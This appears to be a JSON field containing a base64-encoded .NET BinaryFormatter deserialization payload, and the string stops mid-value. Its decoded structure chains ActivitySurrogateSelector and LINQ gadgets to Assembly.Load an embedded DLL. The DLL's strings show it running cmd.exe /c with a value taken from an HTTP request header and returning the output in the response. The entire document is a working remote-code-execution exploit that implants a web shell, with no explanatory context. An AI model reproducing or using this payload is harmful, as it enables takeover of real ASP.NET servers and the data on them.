{"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAA